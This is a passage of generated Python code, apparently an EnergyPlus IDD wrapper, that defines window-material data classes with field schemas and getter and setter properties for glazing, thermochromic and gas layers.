@saturation_volumetric_moisture_content_of_the_soil_layer.setter
def saturation_volumetric_moisture_content_of_the_soil_layer(
        self,
        value=0.3):
    """Set IDD field `Saturation Volumetric Moisture Content of the Soil
    Layer`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self[
        "Saturation Volumetric Moisture Content of the Soil Layer"] = value
@property
def residual_volumetric_moisture_content_of_the_soil_layer(self):
    """Return IDD field `Residual Volumetric Moisture Content of the Soil Layer`.

    | Default value: 0.01
    | Valid range: 0.01 <= value <= 0.1

    Returns:
        float: current field value, or None if not set.
    """
    return self["Residual Volumetric Moisture Content of the Soil Layer"]

@residual_volumetric_moisture_content_of_the_soil_layer.setter
def residual_volumetric_moisture_content_of_the_soil_layer(
        self,
        value=0.01):
    """Set IDD field `Residual Volumetric Moisture Content of the Soil
    Layer`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Residual Volumetric Moisture Content of the Soil Layer"] = value
@property
def initial_volumetric_moisture_content_of_the_soil_layer(self):
    """Return IDD field `Initial Volumetric Moisture Content of the Soil Layer`.

    | Default value: 0.1
    | Valid range: 0.05 < value <= 0.5

    Returns:
        float: current field value, or None if not set.
    """
    return self["Initial Volumetric Moisture Content of the Soil Layer"]

@initial_volumetric_moisture_content_of_the_soil_layer.setter
def initial_volumetric_moisture_content_of_the_soil_layer(self, value=0.1):
    """Set IDD field `Initial Volumetric Moisture Content of the Soil
    Layer`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Initial Volumetric Moisture Content of the Soil Layer"] = value
@property
def moisture_diffusion_calculation_method(self):
    """Return IDD field `Moisture Diffusion Calculation Method`.

    | The Advanced calculation requires an increased number of timesteps
    | (recommended >20).
    | Default value: Advanced

    Returns:
        str: current value of `moisture_diffusion_calculation_method`,
        or None if not set.
    """
    return self["Moisture Diffusion Calculation Method"]

@moisture_diffusion_calculation_method.setter
def moisture_diffusion_calculation_method(self, value="Advanced"):
    """Set IDD field `Moisture Diffusion Calculation Method`.

    Args:
        value (str): new field value; an invalid value raises ValueError.
    """
    self["Moisture Diffusion Calculation Method"] = value
class WindowMaterialSimpleGlazingSystem(DataObject):

    """Corresponds to IDD object `WindowMaterial:SimpleGlazingSystem`.

    Alternate method of describing windows: this window material object
    defines an entire glazing system using simple performance parameters.
    """

    # Generated IDD schema: per-field metadata (types, bounds, defaults)
    # consumed by the DataObject machinery for validation and lookup.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'u-factor',
             {'name': u'U-Factor',
              'pyname': u'ufactor',
              'minimum>': 0.0,
              'maximum': 7.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': u'W/m2-K'}),
            (u'solar heat gain coefficient',
             {'name': u'Solar Heat Gain Coefficient',
              'pyname': u'solar_heat_gain_coefficient',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'maximum<': 1.0}),
            (u'visible transmittance',
             {'name': u'Visible Transmittance',
              'pyname': u'visible_transmittance',
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'maximum<': 1.0}),
        ]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 3,
        'name': u'WindowMaterial:SimpleGlazingSystem',
        'pyname': u'WindowMaterialSimpleGlazingSystem',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """Return IDD field `Name`, or None if not set (str)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`; an invalid value raises ValueError."""
        self["Name"] = value

    @property
    def ufactor(self):
        """Return IDD field `U-Factor` (W/m2-K), or None if not set.

        | Enter U-Factor including film coefficients.
        | Note the effective upper limit for U-factor is 5.8 W/m2-K.
        | Valid range: 0.0 < value <= 7.0
        """
        return self["U-Factor"]

    @ufactor.setter
    def ufactor(self, value=None):
        """Set IDD field `U-Factor`; an invalid value raises ValueError."""
        self["U-Factor"] = value

    @property
    def solar_heat_gain_coefficient(self):
        """Return IDD field `Solar Heat Gain Coefficient` (SHGC at normal
        incidence; 0.0 < value < 1.0), or None if not set."""
        return self["Solar Heat Gain Coefficient"]

    @solar_heat_gain_coefficient.setter
    def solar_heat_gain_coefficient(self, value=None):
        """Set IDD field `Solar Heat Gain Coefficient`; an invalid value
        raises ValueError."""
        self["Solar Heat Gain Coefficient"] = value

    @property
    def visible_transmittance(self):
        """Return IDD field `Visible Transmittance` (optional; VT at normal
        incidence; 0.0 < value < 1.0), or None if not set."""
        return self["Visible Transmittance"]

    @visible_transmittance.setter
    def visible_transmittance(self, value=None):
        """Set IDD field `Visible Transmittance`; an invalid value raises
        ValueError."""
        self["Visible Transmittance"] = value
class WindowMaterialGlazing(DataObject):

    """Corresponds to IDD object `WindowMaterial:Glazing`.

    Glass material properties for Windows or Glass Doors, using the
    Transmittance/Reflectance input method.
    """

    # Generated IDD schema: per-field metadata (types, bounds, defaults)
    # consumed by the DataObject machinery for validation and lookup.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
            (u'optical data type',
             {'name': u'Optical Data Type',
              'pyname': u'optical_data_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': [u'SpectralAverage',
                                  u'Spectral',
                                  u'BSDF'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u'window glass spectral data set name',
             {'name': u'Window Glass Spectral Data Set Name',
              'pyname': u'window_glass_spectral_data_set_name',
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
            (u'thickness',
             {'name': u'Thickness',
              'pyname': u'thickness',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'm'}),
            (u'solar transmittance at normal incidence',
             {'name': u'Solar Transmittance at Normal Incidence',
              'pyname': u'solar_transmittance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'front side solar reflectance at normal incidence',
             {'name': u'Front Side Solar Reflectance at Normal Incidence',
              'pyname': u'front_side_solar_reflectance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'back side solar reflectance at normal incidence',
             {'name': u'Back Side Solar Reflectance at Normal Incidence',
              'pyname': u'back_side_solar_reflectance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'visible transmittance at normal incidence',
             {'name': u'Visible Transmittance at Normal Incidence',
              'pyname': u'visible_transmittance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'front side visible reflectance at normal incidence',
             {'name': u'Front Side Visible Reflectance at Normal Incidence',
              'pyname': u'front_side_visible_reflectance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'back side visible reflectance at normal incidence',
             {'name': u'Back Side Visible Reflectance at Normal Incidence',
              'pyname': u'back_side_visible_reflectance_at_normal_incidence',
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'infrared transmittance at normal incidence',
             {'name': u'Infrared Transmittance at Normal Incidence',
              'pyname': u'infrared_transmittance_at_normal_incidence',
              'default': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'minimum': 0.0,
              'autocalculatable': False,
              'type': u'real'}),
            (u'front side infrared hemispherical emissivity',
             {'name': u'Front Side Infrared Hemispherical Emissivity',
              'pyname': u'front_side_infrared_hemispherical_emissivity',
              'default': 0.84,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'maximum<': 1.0}),
            (u'back side infrared hemispherical emissivity',
             {'name': u'Back Side Infrared Hemispherical Emissivity',
              'pyname': u'back_side_infrared_hemispherical_emissivity',
              'default': 0.84,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'maximum<': 1.0}),
            (u'conductivity',
             {'name': u'Conductivity',
              'pyname': u'conductivity',
              'default': 0.9,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'W/m-K'}),
            (u'dirt correction factor for solar and visible transmittance',
             {'name': u'Dirt Correction Factor for Solar and Visible Transmittance',
              'pyname': u'dirt_correction_factor_for_solar_and_visible_transmittance',
              'default': 1.0,
              'minimum>': 0.0,
              'maximum': 1.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real'}),
            (u'solar diffusing',
             {'name': u'Solar Diffusing',
              'pyname': u'solar_diffusing',
              'default': u'No',
              'required-field': False,
              'autosizable': False,
              'accepted-values': [u'No',
                                  u'Yes'],
              'autocalculatable': False,
              'type': 'alpha'}),
            (u"young's modulus",
             {'name': u"Young's modulus",
              'pyname': u'youngs_modulus',
              'default': 72000000000.0,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'Pa'}),
            (u"poisson's ratio",
             {'name': u"Poisson's ratio",
              'pyname': u'poissons_ratio',
              'default': 0.22,
              'minimum>': 0.0,
              'required-field': False,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'maximum<': 1.0}),
        ]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 14,
        'name': u'WindowMaterial:Glazing',
        'pyname': u'WindowMaterialGlazing',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """Return IDD field `Name`, or None if not set (str)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`; an invalid value raises ValueError."""
        self["Name"] = value

    @property
    def optical_data_type(self):
        """Return IDD field `Optical Data Type`, or None if not set (str)."""
        return self["Optical Data Type"]

    @optical_data_type.setter
    def optical_data_type(self, value=None):
        """Set IDD field `Optical Data Type`; an invalid value raises
        ValueError."""
        self["Optical Data Type"] = value

    @property
    def window_glass_spectral_data_set_name(self):
        """Return IDD field `Window Glass Spectral Data Set Name` (used only
        when Optical Data Type = Spectral), or None if not set (str)."""
        return self["Window Glass Spectral Data Set Name"]

    @window_glass_spectral_data_set_name.setter
    def window_glass_spectral_data_set_name(self, value=None):
        """Set IDD field `Window Glass Spectral Data Set Name`; an invalid
        value raises ValueError."""
        self["Window Glass Spectral Data Set Name"] = value

    @property
    def thickness(self):
        """Return IDD field `Thickness` (Units: m; IP-Units: in), or None if
        not set (float)."""
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Set IDD field `Thickness`; an invalid value raises ValueError."""
        self["Thickness"] = value

    @property
    def solar_transmittance_at_normal_incidence(self):
        """Return IDD field `Solar Transmittance at Normal Incidence` (used
        only when Optical Data Type = SpectralAverage; value <= 1.0), or None
        if not set (float)."""
        return self["Solar Transmittance at Normal Incidence"]

    @solar_transmittance_at_normal_incidence.setter
    def solar_transmittance_at_normal_incidence(self, value=None):
        """Set IDD field `Solar Transmittance at Normal Incidence`; an
        invalid value raises ValueError."""
        self["Solar Transmittance at Normal Incidence"] = value

    @property
    def front_side_solar_reflectance_at_normal_incidence(self):
        """Return IDD field `Front Side Solar Reflectance at Normal
        Incidence` (used only when Optical Data Type = SpectralAverage; front
        side is the side closest to outdoor air; value <= 1.0), or None if
        not set (float)."""
        return self["Front Side Solar Reflectance at Normal Incidence"]

    @front_side_solar_reflectance_at_normal_incidence.setter
    def front_side_solar_reflectance_at_normal_incidence(self, value=None):
        """Set IDD field `Front Side Solar Reflectance at Normal Incidence`;
        an invalid value raises ValueError."""
        self["Front Side Solar Reflectance at Normal Incidence"] = value

    @property
    def back_side_solar_reflectance_at_normal_incidence(self):
        """Return IDD field `Back Side Solar Reflectance at Normal Incidence`
        (used only when Optical Data Type = SpectralAverage; back side is the
        side closest to zone air; value <= 1.0), or None if not set (float)."""
        return self["Back Side Solar Reflectance at Normal Incidence"]

    @back_side_solar_reflectance_at_normal_incidence.setter
    def back_side_solar_reflectance_at_normal_incidence(self, value=None):
        """Set IDD field `Back Side Solar Reflectance at Normal Incidence`;
        an invalid value raises ValueError."""
        self["Back Side Solar Reflectance at Normal Incidence"] = value

    @property
    def visible_transmittance_at_normal_incidence(self):
        """Return IDD field `Visible Transmittance at Normal Incidence` (used
        only when Optical Data Type = SpectralAverage; value <= 1.0), or None
        if not set (float)."""
        return self["Visible Transmittance at Normal Incidence"]

    @visible_transmittance_at_normal_incidence.setter
    def visible_transmittance_at_normal_incidence(self, value=None):
        """Set IDD field `Visible Transmittance at Normal Incidence`; an
        invalid value raises ValueError."""
        self["Visible Transmittance at Normal Incidence"] = value

    @property
    def front_side_visible_reflectance_at_normal_incidence(self):
        """Return IDD field `Front Side Visible Reflectance at Normal
        Incidence` (used only when Optical Data Type = SpectralAverage;
        value <= 1.0), or None if not set (float)."""
        return self["Front Side Visible Reflectance at Normal Incidence"]

    @front_side_visible_reflectance_at_normal_incidence.setter
    def front_side_visible_reflectance_at_normal_incidence(self, value=None):
        """Set IDD field `Front Side Visible Reflectance at Normal
        Incidence`; an invalid value raises ValueError."""
        self["Front Side Visible Reflectance at Normal Incidence"] = value

    @property
    def back_side_visible_reflectance_at_normal_incidence(self):
        """Return IDD field `Back Side Visible Reflectance at Normal
        Incidence` (used only when Optical Data Type = SpectralAverage;
        value <= 1.0), or None if not set (float)."""
        return self["Back Side Visible Reflectance at Normal Incidence"]

    @back_side_visible_reflectance_at_normal_incidence.setter
    def back_side_visible_reflectance_at_normal_incidence(self, value=None):
        """Set IDD field `Back Side Visible Reflectance at Normal Incidence`;
        an invalid value raises ValueError."""
        self["Back Side Visible Reflectance at Normal Incidence"] = value

    @property
    def infrared_transmittance_at_normal_incidence(self):
        """Return IDD field `Infrared Transmittance at Normal Incidence`
        (value <= 1.0), or None if not set (float)."""
        return self["Infrared Transmittance at Normal Incidence"]

    @infrared_transmittance_at_normal_incidence.setter
    def infrared_transmittance_at_normal_incidence(self, value=None):
        """Set IDD field `Infrared Transmittance at Normal Incidence`; an
        invalid value raises ValueError."""
        self["Infrared Transmittance at Normal Incidence"] = value

    @property
    def front_side_infrared_hemispherical_emissivity(self):
        """Return IDD field `Front Side Infrared Hemispherical Emissivity`
        (default 0.84; value < 1.0), or None if not set (float)."""
        return self["Front Side Infrared Hemispherical Emissivity"]

    @front_side_infrared_hemispherical_emissivity.setter
    def front_side_infrared_hemispherical_emissivity(self, value=0.84):
        """Set IDD field `Front Side Infrared Hemispherical Emissivity`; an
        invalid value raises ValueError."""
        self["Front Side Infrared Hemispherical Emissivity"] = value

    @property
    def back_side_infrared_hemispherical_emissivity(self):
        """Return IDD field `Back Side Infrared Hemispherical Emissivity`
        (default 0.84; value < 1.0), or None if not set (float)."""
        return self["Back Side Infrared Hemispherical Emissivity"]

    @back_side_infrared_hemispherical_emissivity.setter
    def back_side_infrared_hemispherical_emissivity(self, value=0.84):
        """Set IDD field `Back Side Infrared Hemispherical Emissivity`; an
        invalid value raises ValueError."""
        self["Back Side Infrared Hemispherical Emissivity"] = value

    @property
    def conductivity(self):
        """Return IDD field `Conductivity` (Units: W/m-K; default 0.9), or
        None if not set (float)."""
        return self["Conductivity"]

    @conductivity.setter
    def conductivity(self, value=0.9):
        """Set IDD field `Conductivity`; an invalid value raises
        ValueError."""
        self["Conductivity"] = value

    @property
    def dirt_correction_factor_for_solar_and_visible_transmittance(self):
        """Return IDD field `Dirt Correction Factor for Solar and Visible
        Transmittance` (default 1.0; value <= 1.0), or None if not set
        (float)."""
        return self[
            "Dirt Correction Factor for Solar and Visible Transmittance"]

    @dirt_correction_factor_for_solar_and_visible_transmittance.setter
    def dirt_correction_factor_for_solar_and_visible_transmittance(
            self,
            value=1.0):
        """Set IDD field `Dirt Correction Factor for Solar and Visible
        Transmittance`; an invalid value raises ValueError."""
        self[
            "Dirt Correction Factor for Solar and Visible Transmittance"] = value

    @property
    def solar_diffusing(self):
        """Return IDD field `Solar Diffusing` (default "No"), or None if not
        set (str)."""
        return self["Solar Diffusing"]

    @solar_diffusing.setter
    def solar_diffusing(self, value="No"):
        """Set IDD field `Solar Diffusing`; an invalid value raises
        ValueError."""
        self["Solar Diffusing"] = value

    @property
    def youngs_modulus(self):
        """Return IDD field `Young's modulus` (Units: Pa; default
        72000000000.0), or None if not set (float).

        Coefficient used for deflection calculations; used only with complex
        fenestration when the deflection model is set to
        TemperatureAndPressureInput.
        """
        return self["Young's modulus"]

    @youngs_modulus.setter
    def youngs_modulus(self, value=72000000000.0):
        """Set IDD field `Young's modulus`; an invalid value raises
        ValueError."""
        self["Young's modulus"] = value

    @property
    def poissons_ratio(self):
        """Return IDD field `Poisson's ratio` (default 0.22; value < 1.0), or
        None if not set (float).

        Coefficient used for deflection calculations; used only with complex
        fenestration when the deflection model is set to
        TemperatureAndPressureInput.
        """
        return self["Poisson's ratio"]

    @poissons_ratio.setter
    def poissons_ratio(self, value=0.22):
        """Set IDD field `Poisson's ratio`; an invalid value raises
        ValueError."""
        self["Poisson's ratio"] = value
class WindowMaterialGlazingGroupThermochromic(DataObject):

    """Corresponds to IDD object `WindowMaterial:GlazingGroup:Thermochromic`.

    Describes thermochromic glass at different temperatures via repeating
    (temperature, glazing-name) extensible field pairs.
    """

    # Generated IDD schema: per-field metadata (types, bounds, defaults)
    # consumed by the DataObject machinery for validation and lookup.
    _schema = {
        'extensible-fields': OrderedDict([
            (u'optical data temperature 1',
             {'name': u'Optical Data Temperature 1',
              'pyname': u'optical_data_temperature_1',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'real',
              'unit': u'C'}),
            (u'window material glazing name 1',
             {'name': u'Window Material Glazing Name 1',
              'pyname': u'window_material_glazing_name_1',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'object-list'}),
        ]),
        'fields': OrderedDict([
            (u'name',
             {'name': u'Name',
              'pyname': u'name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': u'alpha'}),
        ]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 3,
        'name': u'WindowMaterial:GlazingGroup:Thermochromic',
        'pyname': u'WindowMaterialGlazingGroupThermochromic',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """Return IDD field `Name`, or None if not set (str)."""
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Set IDD field `Name`; an invalid value raises ValueError."""
        self["Name"] = value

    def add_extensible(self,
                       optical_data_temperature_1=None,
                       window_material_glazing_name_1=None,
                       ):
        """Append one group of extensible field values.

        Args:
            optical_data_temperature_1 (float): value for IDD Field
                `Optical Data Temperature 1` (Units: C; IP-Units: F).
                If None, it is not checked against the specification and
                is assumed to be a missing value.
            window_material_glazing_name_1 (str): value for IDD Field
                `Window Material Glazing Name 1`. If None, it is not
                checked against the specification and is assumed to be a
                missing value.
        """
        # Validate each value through check_value before storing the group.
        group = [
            self.check_value(
                "Optical Data Temperature 1",
                optical_data_temperature_1),
            self.check_value(
                "Window Material Glazing Name 1",
                window_material_glazing_name_1),
        ]
        self._extdata.append(group)

    @property
    def extensibles(self):
        """Return the list of all extensible field groups."""
        return self._extdata

    @extensibles.setter
    def extensibles(self, extensibles):
        """Replace all extensible field groups with `extensibles`.

        Args:
            extensibles (list): nested list of extensible values
        """
        self._extdata = []
        for group in extensibles:
            self.add_extensible(*group)
class WindowMaterialGlazingRefractionExtinctionMethod(DataObject):
""" Corresponds to IDD object `WindowMaterial:Glazing:RefractionExtinctionMethod`
Glass material properties for Windows or Glass Doors
Index of Refraction/Extinction Coefficient input method
Not to be used for coated glass
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'solar index of refraction',
{'name': u'Solar Index of Refraction',
'pyname': u'solar_index_of_refraction',
'minimum>': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar extinction coefficient',
{'name': u'Solar Extinction Coefficient',
'pyname': u'solar_extinction_coefficient',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'1/m'}),
(u'visible index of refraction',
{'name': u'Visible Index of Refraction',
'pyname': u'visible_index_of_refraction',
'minimum>': 1.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'visible extinction coefficient',
{'name': u'Visible Extinction Coefficient',
'pyname': u'visible_extinction_coefficient',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'1/m'}),
(u'infrared transmittance at normal incidence',
{'name': u'Infrared Transmittance at Normal Incidence',
'pyname': u'infrared_transmittance_at_normal_incidence',
'default': 0.0,
'maximum<': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'infrared hemispherical emissivity',
{'name': u'Infrared Hemispherical Emissivity',
'pyname': u'infrared_hemispherical_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'default': 0.9,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'dirt correction factor for solar and visible transmittance',
{'name': u'Dirt Correction Factor for Solar and Visible Transmittance',
'pyname': u'dirt_correction_factor_for_solar_and_visible_transmittance',
'default': 1.0,
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar diffusing',
{'name': u'Solar Diffusing',
'pyname': u'solar_diffusing',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'No',
u'Yes'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'WindowMaterial:Glazing:RefractionExtinctionMethod',
'pyname': u'WindowMaterialGlazingRefractionExtinctionMethod',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def solar_index_of_refraction(self):
"""field `Solar Index of Refraction`
| value > 1.0
Args:
value (float): value for IDD Field `Solar Index of Refraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_index_of_refraction` or None if not set
"""
return self["Solar Index of Refraction"]
@solar_index_of_refraction.setter
def solar_index_of_refraction(self, value=None):
"""Corresponds to IDD field `Solar Index of Refraction`"""
self["Solar Index of Refraction"] = value
@property
def solar_extinction_coefficient(self):
"""field `Solar Extinction Coefficient`
| Units: 1/m
Args:
value (float): value for IDD Field `Solar Extinction Coefficient`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_extinction_coefficient` or None if not set
"""
return self["Solar Extinction Coefficient"]
@solar_extinction_coefficient.setter
def solar_extinction_coefficient(self, value=None):
"""Corresponds to IDD field `Solar Extinction Coefficient`"""
self["Solar Extinction Coefficient"] = value
@property
def visible_index_of_refraction(self):
"""field `Visible Index of Refraction`
| value > 1.0
Args:
value (float): value for IDD Field `Visible Index of Refraction`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_index_of_refraction` or None if not set
"""
return self["Visible Index of Refraction"]
@visible_index_of_refraction.setter
def visible_index_of_refraction(self, value=None):
"""Corresponds to IDD field `Visible Index of Refraction`"""
self["Visible Index of Refraction"] = value
@property
def visible_extinction_coefficient(self):
"""field `Visible Extinction Coefficient`
| Units: 1/m
Args:
value (float): value for IDD Field `Visible Extinction Coefficient`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_extinction_coefficient` or None if not set
"""
return self["Visible Extinction Coefficient"]
@visible_extinction_coefficient.setter
def visible_extinction_coefficient(self, value=None):
"""Corresponds to IDD field `Visible Extinction Coefficient`"""
self["Visible Extinction Coefficient"] = value
@property
def infrared_transmittance_at_normal_incidence(self):
"""field `Infrared Transmittance at Normal Incidence`
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance_at_normal_incidence` or None if not set
"""
return self["Infrared Transmittance at Normal Incidence"]
@infrared_transmittance_at_normal_incidence.setter
def infrared_transmittance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance at Normal
Incidence`"""
self["Infrared Transmittance at Normal Incidence"] = value
@property
def infrared_hemispherical_emissivity(self):
"""field `Infrared Hemispherical Emissivity`
| Emissivity of front and back side assumed equal
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_hemispherical_emissivity` or None if not set
"""
return self["Infrared Hemispherical Emissivity"]
@infrared_hemispherical_emissivity.setter
def infrared_hemispherical_emissivity(self, value=0.84):
"""Corresponds to IDD field `Infrared Hemispherical Emissivity`"""
self["Infrared Hemispherical Emissivity"] = value
@property
def conductivity(self):
"""field `Conductivity`
| Units: W/m-K
| Default value: 0.9
Args:
value (float): value for IDD Field `Conductivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity` or None if not set
"""
return self["Conductivity"]
@conductivity.setter
def conductivity(self, value=0.9):
"""Corresponds to IDD field `Conductivity`"""
self["Conductivity"] = value
@property
def dirt_correction_factor_for_solar_and_visible_transmittance(self):
"""field `Dirt Correction Factor for Solar and Visible Transmittance`
| Default value: 1.0
| value <= 1.0
Args:
value (float): value for IDD Field `Dirt Correction Factor for Solar and Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `dirt_correction_factor_for_solar_and_visible_transmittance` or None if not set
"""
return self[
"Dirt Correction Factor for Solar and Visible Transmittance"]
@dirt_correction_factor_for_solar_and_visible_transmittance.setter
def dirt_correction_factor_for_solar_and_visible_transmittance(
self,
value=1.0):
"""Corresponds to IDD field `Dirt Correction Factor for Solar and
Visible Transmittance`"""
self[
"Dirt Correction Factor for Solar and Visible Transmittance"] = value
@property
def solar_diffusing(self):
"""field `Solar Diffusing`
| Default value: No
Args:
value (str): value for IDD Field `Solar Diffusing`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `solar_diffusing` or None if not set
"""
return self["Solar Diffusing"]
@solar_diffusing.setter
def solar_diffusing(self, value="No"):
"""Corresponds to IDD field `Solar Diffusing`"""
self["Solar Diffusing"] = value
class WindowMaterialGas(DataObject):
    """ Corresponds to IDD object `WindowMaterial:Gas`
        Gas material properties that are used in Windows or Glass Doors
    """
    # IDD-derived field metadata consumed by the DataObject base class for
    # lookup and validation of the properties below.  'minimum>' marks an
    # exclusive lower bound; 'accepted-values' restricts alpha fields to the
    # listed choices.  NOTE(review): validation itself happens in DataObject,
    # which is defined elsewhere — confirm against that class.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'gas type',
                                       {'name': u'Gas Type',
                                        'pyname': u'gas_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Air',
                                                            u'Argon',
                                                            u'Krypton',
                                                            u'Xenon',
                                                            u'Custom'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'thickness',
                                       {'name': u'Thickness',
                                        'pyname': u'thickness',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'conductivity coefficient a',
                                       {'name': u'Conductivity Coefficient A',
                                        'pyname': u'conductivity_coefficient_a',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K'}),
                                      (u'conductivity coefficient b',
                                       {'name': u'Conductivity Coefficient B',
                                        'pyname': u'conductivity_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K2'}),
                                      (u'conductivity coefficient c',
                                       {'name': u'Conductivity Coefficient C',
